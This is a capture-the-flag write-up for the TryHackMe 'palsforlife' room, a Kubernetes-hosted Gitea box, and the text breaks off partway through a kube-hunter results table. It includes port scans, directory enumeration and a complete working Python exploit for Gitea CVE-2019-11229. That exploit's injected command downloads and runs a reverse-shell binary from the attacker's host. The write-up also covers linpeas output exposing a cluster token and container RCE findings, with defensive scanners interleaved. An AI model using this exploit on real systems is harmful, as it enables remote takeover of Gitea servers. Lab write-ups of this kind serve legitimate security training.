Machine writeup for https://tryhackme.com/room/palsforlife

pre-pentesting (general information gathering)

port & service

Because of the network and machine deployment, commands like nmap or rustscan need to be retried several times to get correct information.

command : rustscan <target ip> -- -A

PORT      STATE SERVICE           REASON         VERSION

22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c9:f7:dd:3d:79:bb:f8:44:0f:bd:87:bd:8b:af:e1:5a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHvPJdllGsYwbwbvXMP0T/d6NcClFy34rSyAVlCPB5jeR0/7DffGcCbj/+kwkTKw82Eb6HtTLKvQwFQduzGqba74IUgxJ3NmQ4IrnbwYg0Mqf1z0ZWeD3rMQKOJeDKcApnW24P2zjBjZ8iNf449DzQLQoQyhti0MQavrLYMwcELCd3u+83FD0pZZN4q5d5yor9EV++lZ5fpU0+seEWoXY9c0LfA9CX+6jwv2cQFTwqC8R78kkTimczT8tVVds/z0KUwpL7t2lsVMxIJ1SKi7XiroU0zJ+YkttZoio7++1vGtW+27Kv/PGQPI7v+953TPZ06BPC3/nxU7CD9Gtpig/h
| 256 4c:48:9d:c6:b4:e2:17:99:76:48:20:fe:96:d2:c8:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBKRe1KeqoY2DzrMJa+jbQPKLy+IMjqWDOtBQy+Oohg2R+bm1H1VcJWSTE2HhxW7GsbzBEAtqW+290KhTOOmiSQ=
| 256 d8:e2:f7:ac:4d:cd:68:66:d7:a9:64:1c:42:4a:8e:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiIJ3rd6/JIuiXUx0sJhq8nY1ZypBueO4uckLvIzpur

6443/tcp open ssl/sun-sr-https? syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:26:28 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:25:52 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| HTTPOptions:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Sat, 25 Sep 2021 01:25:53 GMT
| Content-Length: 129
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| ssl-cert: Subject: commonName=k3s/organizationName=k3s
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc.cluster.local, DNS:localhost, IP Address:10.10.53.211, IP Address:10.43.0.1, IP Address:127.0.0.1, IP Address:172.30.18.136, IP Address:192.168.1.244
| Issuer: commonName=k3s-server-ca@1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2022-09-25T01:23:17
| MD5: 89c4 db42 e7d3 765a 081b 97fe bfaa b6cf
| SHA-1: 668a 6282 5cc2 6e3c c3bf 7da1 14cf 8801 e4bc 9e96

10250/tcp open ssl/http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=palsforlife
| Subject Alternative Name: DNS:palsforlife, DNS:localhost, IP Address:127.0.0.1, IP Address:10.10.53.211
| Issuer: commonName=k3s-server-ca@1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2022-09-25T01:22:28
| MD5: dd8f 3e00 984a aae5 b092 cf90 5a65 7b58
| SHA-1: 92ea 9137 6e13 4d03 6317 4561 b064 bbbe 3d06 f7be

30180/tcp open http syn-ack ttl 62 nginx 1.21.0
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.21.0
|_http-title: 403 Forbidden

31111/tcp open unknown syn-ack ttl 62
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=9a7a433126963280; Path=/; HttpOnly
| Set-Cookie: _csrf=M3bNOq17RI26F_1JdUfUXASpTfA6MTYzMjUzMzE0NTE2Njk0MzY5OQ%3D%3D; Path=/; Expires=Sun, 26 Sep 2021 01:25:45 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 25 Sep 2021 01:25:45 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
| <meta name="keywords" content="go,git,self-hosted,gitea
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=850e8dbfd631d68e; Path=/; HttpOnly
| Set-Cookie: _csrf=PhEztTb31LOiE2Ielp2pGvVKRL06MTYzMjUzMzE0NTg1ODk3MzA3NA%3D%3D; Path=/; Expires=Sun, 26 Sep 2021 01:25:45 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 25 Sep 2021 01:25:45 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
|_ <meta name="keywords" content="

31112/tcp open ssh syn-ack ttl 62 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:c6:63:84:93:b8:04:ce:1c:f5:ce:c7:0e:ca:eb:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL89blW/fideD2Xo7UKOytdLmzkVLToqJFWPKHQ4UP9ZNXTr7GAqeXvRRB9wmdsv4CpNRnQh3KtHuB7QgfZA//6aHtf5ss8zQydhZW5HS6a3Y2DhRnmOLtDQK5XHA1icP2EMYKIH0rfgPFFm1SRUieqbn62Zu//Cd8TdTfax7u1X3raA1nA7WEa+bnH1U4zO7sC6pZVSh7OoDRR/uD8r1xy2IxwcEIHyLVYdJdjxNhy8ryzkU1fwwLbzhSOsA+9bN/V4pq5/tLvipsX5FpIeF7CwHd+3EWlHl64zTWuCnvr5u/MBN3Q/bM2UGbwxj8Jq8tFRbQXoSfXpTrodKmLBSB
| 256 93:6b:41:5f:89:14:97:0c:6b:53:ab:ba:af:71:f1:40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWQuDYkhFhWAillXUpZDXIg86x6wt2RLODmfT6jSjAW8VQO+B6efJrMV5Z5YkJ57WmqTF2rPDxEBIegPiMHddU=
| 256 e8:c4:94:7b:72:d7:4c:1c:bd:51:4a:84:81:4b:68:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJgWYJQirOpfa5TYPCcHU+p2NbHFMTjHFyTyGU9KVng
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).

wrap up

OK. Keywords like k3s and kubernetes clearly indicate how the server is built.

We can guess that the gitea and nginx servers on ports 31111/31112 are pods in the Kubernetes cluster (very likely, though not everyone deploys that way).

This is basic k8s knowledge.

The host also has a different hostname, palsforlife (it appears in the certificate on 10250), so add it to our /etc/hosts file.
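As an added example (not part of the original writeup), a small Python parser over a constructed excerpt of the scan above that pulls out per-port service, TTL and certificate SAN data and derives the same picture: 6443 is the k3s API server, 10250 the kubelet, and the three ports inside the default NodePort range (30000-32767) answer with a TTL one lower than the host's own services, i.e. one extra hop, which is what forwarding into pods looks like.

```python
import re
from typing import Dict, List

# Constructed excerpt of the rustscan/nmap -A output above (host keys and certificates omitted).
SCAN_EXCERPT = """\
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6443/tcp open ssl/sun-sr-https? syn-ack ttl 63
| ssl-cert: Subject: commonName=k3s/organizationName=k3s
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc.cluster.local, DNS:localhost, IP Address:10.10.53.211, IP Address:10.43.0.1, IP Address:127.0.0.1
10250/tcp open ssl/http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| ssl-cert: Subject: commonName=palsforlife
| Subject Alternative Name: DNS:palsforlife, DNS:localhost, IP Address:127.0.0.1, IP Address:10.10.53.211
30180/tcp open http syn-ack ttl 62 nginx 1.21.0
|_http-title: 403 Forbidden
31111/tcp open unknown syn-ack ttl 62
31112/tcp open ssh syn-ack ttl 62 OpenSSH 7.5 (protocol 2.0)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+syn-ack\s+ttl\s+(\d+)\s*(.*)$")
CN_RE = re.compile(r"commonName=([^/\s]+)")
SAN_RE = re.compile(r"Subject Alternative Name:\s*(.*)$")
NODEPORT_RANGE = range(30000, 32768)  # Kubernetes default NodePort range
APISERVER_SAN = "kubernetes.default.svc.cluster.local"  # always in the API server's cert


def parse_scan(text: str) -> List[Dict]:
    """Turn the per-port nmap lines into records with TTL, product and certificate data."""
    records: List[Dict] = []
    cur = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            cur = {"port": int(m.group(1)), "service": m.group(2), "ttl": int(m.group(3)),
                   "product": m.group(4).strip(), "cn": None, "san_dns": [], "san_ip": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        body = line.lstrip("|_ ").strip()  # drop nmap's script-output prefix
        if body.startswith("ssl-cert:"):
            cn = CN_RE.search(body)
            cur["cn"] = cn.group(1) if cn else None
        sm = SAN_RE.search(body)
        if sm:
            for entry in sm.group(1).split(","):
                kind, _, value = entry.strip().partition(":")
                if kind == "DNS":
                    cur["san_dns"].append(value)
                elif kind == "IP Address":
                    cur["san_ip"].append(value)
    return records


def summarize(text: str) -> Dict:
    """Derive the cluster picture: which port is the API server / kubelet, which distro signed
    the certs, which open ports sit in the NodePort range, and which answer one hop further
    away than the host itself (TTL one lower), i.e. are forwarded into a pod."""
    records = parse_scan(text)
    summary: Dict = {"distro": None, "apiserver": None, "kubelet": None,
                     "nodeports": [], "forwarded": [], "internal_ips": []}
    if not records:
        return summary
    host_ttl = max(r["ttl"] for r in records)
    for r in records:
        p = r["port"]
        if APISERVER_SAN in r["san_dns"]:
            summary["apiserver"] = p
            # Non-loopback SAN IPs of the API server cert leak internal addressing;
            # 10.43.0.1 is the k3s default ClusterIP of the kubernetes service.
            summary["internal_ips"] = [ip for ip in r["san_ip"] if not ip.startswith("127.")]
        if p == 10250 and "Golang net/http" in r["product"]:
            summary["kubelet"] = p
        if r["cn"] == "k3s":
            summary["distro"] = "k3s"
        if p in NODEPORT_RANGE:
            summary["nodeports"].append(p)
        if r["ttl"] < host_ttl:
            summary["forwarded"].append(p)
    return summary
```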

Hacking

Hacking entrypoint: Gitea

All access attempts on the other services (ssh, nginx) are denied; only gitea is open, and it exposes its registration interface.

attempts

So, turn on our directory scanner and go register an account.

My account looks like this:

{
"user": "root",
"pass": "esonhugh"
}

And it will be used later.

Gobuster finished like this:

$ gobuster dir -u http://<target-ip>:31111/ --wordlist=/usr/share/wordlists/dirb/big.txt -t 30 # the wordlist is in my kali
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.53.211:31111/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/25 09:44:51 Starting gobuster in directory enumeration mode
===============================================================
/Root (Status: 200) [Size: 10271]
/admin (Status: 302) [Size: 34] [--> /user/login]
/avatars (Status: 302) [Size: 32] [--> /avatars/]
/debug (Status: 200) [Size: 160]
/explore (Status: 302) [Size: 37] [--> /explore/repos]
/healthcheck (Status: 200) [Size: 26]
/issues (Status: 302) [Size: 34] [--> /user/login]
/notifications (Status: 302) [Size: 34] [--> /user/login]
/root (Status: 200) [Size: 10271]

===============================================================
2021/09/25 09:50:19 Finished
===============================================================

/root is my account, so we can ignore it.

What we need to look at is /debug and /healthcheck. They contain information about memory and CPUs, and expose file locations and stack traces.

Gitea has an API as well.

gitea_api:
API docs: http://palsforlife:31111/api/swagger
API JSON: http://palsforlife:31111/swagger.v1.json

Use it like this:

$ curl -X GET "http://palsforlife:31111/api/v1/version" \
-H "accept: application/json" -v

{"version number": "38d8b8c"}

# If the commit hash is 38d8b8c, you can find the version on the gitea releases page on GitHub: it is 1.5.1. Search Google for "gitea release" and use Ctrl-F in Chrome to search for the string "38d8b8c".

exploits

Let's find some exploits or vulns for it. Go to https://exploit-db.com/

It gives you three exploits for gitea. The one for version 1.4 is too old and the 1.12.5 one is too new, so let's check the 1.7 one.

AHHHH. My senior's exploit. :-)

https://www.exploit-db.com/exploits/49383

But it has a few small problems. We need to change the variables.

#!/usr/bin/python3
# Exploit Title: Gitea 1.7.5 - Remote Code Execution
# Date: 2021-09-25
# Exploit Reproducer: Skyworship
# Exploit Author: 1F98D
# Original Author: LoRexxar
# Software Link: https://gitea.io/en-us/
# Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3
# CVE: CVE-2019-11229
# References:
# https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa
#
# Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings,
# leading to authenticated remote code execution.
#

import re
import os
import sys
import random
import string
import requests
import tempfile
import threading
import http.server
import socketserver
import urllib.parse
from functools import partial

USERNAME = "root"  # the username for gitea
PASSWORD = "esonhugh"  # the password for username
HOST_ADDR = "10.10.10.10"  # your machine ip in vpn
HOST_PORT = 31111  # your machine git server listen on
URL = 'http://10.10.109.75:31111'  # target machine gitea http url
# Command Gitea ends up running as core.sshCommand when it syncs the mirror.
# HOST_ADDR is concatenated in; it must not be left inside the quotes.
CMD = 'wget http://' + HOST_ADDR + ':8000/elfhandler -O /tmp/shellxxx ; chmod 777 /tmp/shellxxx ; /tmp/shellxxx'
# Serve the payload from a separate http server on port 8000 hosting the file "elfhandler",
# your reverse tcp handler binary (e.g. meterpreter).

# Login
s = requests.Session()
print('Logging in')
body = {
    'user_name': USERNAME,
    'password': PASSWORD
}
r = s.post(URL + '/user/login', data=body)
if r.status_code != 200:
    print('Login unsuccessful')
    sys.exit(1)
print('Logged in successfully')

# Obtain user ID for future requests
print('Retrieving user ID')
r = s.get(URL + '/')
if r.status_code != 200:
    print('Could not retrieve user ID')
    sys.exit(1)

m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text)
if m is None:
    print('Could not find _uid in page (login really succeeded?)')
    sys.exit(1)
USER_ID = m.group(1)
print('Retrieved user ID: {}'.format(USER_ID))

# Hosting the repository to clone: a bare repo with one commit, served over plain HTTP.
# Created under /tmp explicitly because the http server below serves /tmp and
# gitTemp[5:] strips that prefix.
gitTemp = tempfile.mkdtemp(dir='/tmp')
os.system('cd {} && git init'.format(gitTemp))
# Placeholder committer identity; git only needs some value here.
os.system('cd {} && git config user.email x@example.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp))
os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp))
os.system('cd {}.git && git update-server-info'.format(gitTemp))
handler = partial(http.server.SimpleHTTPRequestHandler, directory='/tmp')
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", HOST_PORT), handler)
t = threading.Thread(target=httpd.serve_forever)
t.start()
print('Created temporary git server to host {}.git'.format(gitTemp))

# Create the repository as a mirror of the one we are serving
print('Creating repository')
REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
body = {
    '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
    'uid': USER_ID,
    'repo_name': REPO_NAME,
    'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]),
    'mirror': 'on'
}
r = s.post(URL + '/repo/migrate', data=body)
if r.status_code != 200:
    print('Error creating repo')
    httpd.shutdown()
    t.join()
    sys.exit(1)
print('Repo "{}" created'.format(REPO_NAME))

# Inject command into config file: the quotes and line breaks in the mirror address
# end the url value and add a [core] sshCommand entry to the repo's .git/config
print('Injecting command into repo')
body = {
    '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
    'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD),
    'action': 'mirror',
    'enable_prune': 'on',
    'interval': '8h0m0s'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
    print('Error injecting command')
    httpd.shutdown()
    t.join()
    sys.exit(1)
print('Command injected')

# Trigger the command by forcing a mirror sync
print('Triggering command')
body = {
    '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')),
    'action': 'mirror-sync'
}
r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body)
if r.status_code != 200:
    print('Error triggering command')
    httpd.shutdown()
    t.join()
    sys.exit(1)

print('Command triggered')

# Shutdown the git server
httpd.shutdown()
t.join()

# You need to clean up the temporary git directories (gitTemp and gitTemp.git) manually.

Yep! Shell popped.
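From the defending side, the injection above works because a mirror address containing quotes and line breaks is written straight into the repository's .git/config. As an added example (not the writeup's or Gitea's own code), here is a validator of the kind the fixed versions need on the mirror address, plus a scanner that flags already-injected repo configs by their core.* keys; both sample configs are constructed to show the shape of the file, not captured from the room.

```python
import re
import urllib.parse
from typing import List, Tuple

# core.* keys that make git run a program. A server-managed mirror repo has no reason
# to carry any of them, so their presence is a strong indicator of config injection.
DANGEROUS_CORE_KEYS = {"sshcommand", "hookspath", "fsmonitor", "gitproxy", "pager", "editor", "askpass"}
ALLOWED_SCHEMES = {"http", "https", "ssh", "git"}

# Constructed sample (illustrative, not captured from the room): the shape a mirror's
# .git/config takes once a mirror_address like the exploit's has been written into it.
INJECTED_CONFIG = '''[core]
\trepositoryformatversion = 0
\tbare = true
[remote "origin"]
\turl = """ssh://example.com/x/x"""
[core]
sshCommand="/bin/sh -c 'echo injected'"
a=""""""
\tmirror = true
'''

# Constructed sample of a healthy mirror config.
CLEAN_CONFIG = '''[core]
\tbare = true
[remote "origin"]
\turl = https://github.com/go-gitea/gitea.git
\tmirror = true
'''

SECTION_RE = re.compile(r'^\[([^\s\]"]+)(?:\s+"([^"]*)")?\]$')


def is_safe_mirror_url(url: str) -> bool:
    """Server-side check a mirror address must pass before it is written to .git/config:
    no quotes or control characters (which is how a payload closes the quoted value and
    opens a new section) and a real URL with an allowed scheme and a host part."""
    if not url or any(ch == '"' or ord(ch) < 0x20 for ch in url):
        return False
    parts = urllib.parse.urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def _unquote(value: str) -> str:
    # Strip exactly one pair of surrounding quotes so leftover quotes stay visible as evidence.
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1]
    return value


def parse_git_config(text: str) -> List[Tuple[str, str, str]]:
    """Tolerant git-config reader returning (section, key, value) triples. Section and key
    names are lower-cased as git treats them; subsection names keep their case."""
    triples = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).lower()
            if m.group(2) is not None:
                section += "." + m.group(2)
            continue
        key, _, value = line.partition("=")
        triples.append((section, key.strip().lower(), _unquote(value.strip())))
    return triples


def scan_git_config(text: str) -> List[Tuple[str, str, str]]:
    """Findings for one repo config: dangerous core.* keys, and remote URLs that would not
    have passed is_safe_mirror_url. Run it over every <repo>.git/config on a Gitea host."""
    findings = []
    for section, key, value in parse_git_config(text):
        if section == "core" and key in DANGEROUS_CORE_KEYS:
            findings.append((section, key, value))
        elif section.startswith("remote.") and key == "url" and not is_safe_mirror_url(value):
            findings.append((section, key, value))
    return findings
```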

Upload a Linux enumeration script such as linpeas.sh to collect more info (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) (in meterpreter, just use the upload command).

linpeas shows the exploit methods together with HackTricks links.

A very useful site for hacking.

Run it with a command like

nohup sh linpeas.sh > enum & # nohup keeps it running if the session hangs up

and then fetch the enum file.

Some locations need attention.

...
╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes

════════════════════════════════════╣ Containers ╠════════════════════════════════════
╔══════════╣ Container related tools present
╔══════════╣ Container details
═╣ Is this a container? ........... No
(kubernetes)═╣ Any running containers? ........ No

╔══════════╣ Container & breakout enumeration
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
═╣ Container ID ...................
═╣ Kubernetes namespace ........... default
═╣ Kubernetes token ............... <The k3s TOKEN there>
═╣ Vulnerable to CVE-2019-5021 .. No
...
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. total 12
drwxrwxrwx 3 root root 4096 May 31 22:01 .
drwxr-xr-x 1 root root 4096 Sep 25 01:25 ..
drwxr-xr-x 2 root root 4096 May 31 22:01 ..2021_05_31_22_01_32.228018415
lrwxrwxrwx 1 root root 31 May 31 22:01 ..data -> ..2021_05_31_22_01_32.228018415
lrwxrwxrwx 1 root root 16 May 31 22:01 flag2.txt -> ..data/flag2.txt

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/root/flag2.txt
/root/..data
/root/..2021_05_31_22_01_32.228018415
/root/..2021_05_31_22_01_32.228018415/flag2.txt
...

Hacking K3s Pods - Token mis-config

Attempts

But actually I am new to the K8s framework.

https://book.hacktricks.xyz/pentesting/pentesting-kubernetes This doc helped me a lot.

Now we are in the pod that serves gitea. I use the vuln scanner kube-hunter.

Install it and give it the token and the server address so it scans automatically.

You will run into certificate problems; add the -k option (curl) or --insecure-skip-tls-verify (kubectl) to ignore them.
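The "Patched a role" and "Patched A Pod" findings kube-hunter reports below exist because the token linpeas found in the pod (the default service account's) is bound to far more than the workload needs. As an added example (not the room's or kube-hunter's code), a small RBAC evaluator over constructed bindings reproduces the authorizer's namespace logic to show the difference between the weak and the fixed binding, plus the automount check that removes the token from the pod altogether; the role names and rules are assumptions, the namespace list is the one kube-hunter found on this box.

```python
from typing import Dict, List, Tuple

# Constructed RBAC objects in the shape the Kubernetes API returns them (assumptions, not
# objects read from the room). WEAK_BINDINGS gives the pod's default service account a
# cluster-wide role that can patch pods and roles; FIXED_BINDINGS scopes the same workload
# to a namespaced Role with only what it needs.
CLUSTER_ROLES: Dict[str, List[Dict]] = {
    "pod-and-role-editor": [
        {"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "patch", "delete"]},
        {"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["roles"], "verbs": ["get", "patch"]},
    ],
}
ROLES: Dict[Tuple[str, str], List[Dict]] = {  # keyed by (namespace, name)
    ("default", "config-reader"): [
        {"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]},
    ],
}
SA = {"kind": "ServiceAccount", "name": "default", "namespace": "default"}
WEAK_BINDINGS = [
    {"kind": "ClusterRoleBinding", "roleRef": {"kind": "ClusterRole", "name": "pod-and-role-editor"},
     "subjects": [SA]},
]
FIXED_BINDINGS = [
    {"kind": "RoleBinding", "namespace": "default", "roleRef": {"kind": "Role", "name": "config-reader"},
     "subjects": [SA]},
]
# Namespaces kube-hunter listed on this box (its KHV007 finding).
NAMESPACES = ["default", "kube-system", "kube-public", "kube-node-lease"]
# Namespaced resources where a write grant to a workload token is worth a finding.
SENSITIVE = {("", "pods"), ("", "secrets"), ("rbac.authorization.k8s.io", "roles"),
             ("rbac.authorization.k8s.io", "rolebindings")}
WRITE_VERBS = ["create", "update", "patch", "delete", "deletecollection"]


def subject_matches(subject: Dict, sa: Dict) -> bool:
    """A binding reaches a service account directly or via the implicit groups it belongs to."""
    if subject["kind"] == "ServiceAccount":
        return subject["name"] == sa["name"] and subject.get("namespace") == sa["namespace"]
    if subject["kind"] == "Group":
        return subject["name"] in ("system:authenticated", "system:serviceaccounts",
                                   "system:serviceaccounts:" + sa["namespace"])
    return False


def rules_for(binding: Dict) -> List[Dict]:
    ref = binding["roleRef"]
    if ref["kind"] == "ClusterRole":
        return CLUSTER_ROLES.get(ref["name"], [])
    return ROLES.get((binding["namespace"], ref["name"]), [])


def rule_allows(rule: Dict, api_group: str, resource: str, verb: str) -> bool:
    def hit(values: List[str], want: str) -> bool:
        return "*" in values or want in values
    return (hit(rule.get("apiGroups", []), api_group) and hit(rule.get("resources", []), resource)
            and hit(rule.get("verbs", []), verb))


def can(sa: Dict, verb: str, api_group: str, resource: str, namespace: str, bindings: List[Dict]) -> bool:
    """Decide like the RBAC authorizer: a ClusterRoleBinding applies in every namespace, a
    RoleBinding only in its own; the first binding whose role grants the verb wins."""
    for b in bindings:
        if b["kind"] == "RoleBinding" and b["namespace"] != namespace:
            continue
        if not any(subject_matches(s, sa) for s in b.get("subjects", [])):
            continue
        if any(rule_allows(r, api_group, resource, verb) for r in rules_for(b)):
            return True
    return False


def audit(sa: Dict, bindings: List[Dict], namespaces: List[str]) -> List[Tuple[str, str, str]]:
    """Every (namespace, verb, resource) write grant on a sensitive resource held by the token."""
    findings = []
    for ns in namespaces:
        for group, resource in sorted(SENSITIVE):
            for verb in WRITE_VERBS:
                if can(sa, verb, group, resource, ns, bindings):
                    findings.append((ns, verb, resource))
    return findings


def token_mounted(pod_spec: Dict, service_account: Dict) -> bool:
    """Whether the pod gets the token file linpeas found: the pod spec's
    automountServiceAccountToken overrides the service account's, and the default is True."""
    if "automountServiceAccountToken" in pod_spec:
        return bool(pod_spec["automountServiceAccountToken"])
    return bool(service_account.get("automountServiceAccountToken", True))
```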

Nodes
+-------------+-------------+
| TYPE | LOCATION |
+-------------+-------------+
| Node/Master | palsforlife |
+-------------+-------------+

Detected Services
+-------------+-------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+-------------+-------------------+----------------------+
| Kubelet API | palsforlife:10250 | The Kubelet is the |
| | | main component in |
| | | every Node, all pod |
| | | operations goes |
| | | through the kubelet |
+-------------+-------------------+----------------------+
| API Server | palsforlife:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+-------------+-------------------+----------------------+

Vulnerabilities
For further information about a vulnerability, search its ID in:
https://avd.aquasec.com/
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| ID | LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV040 | palsforlife:10250 | Remote Code | Exposed Run Inside | An attacker could | uname -a: Linux ngin |
| | | Execution | Container | run an arbitrary | x-7f459c6889-8slv2 |
| | | | | command inside a | 4.15.0-112-generic |
| | | | | container | #113-Ubuntu SMP Thu |
| | | | | | Jul 9 23:41:39 UTC |
| | | | | | 202... |
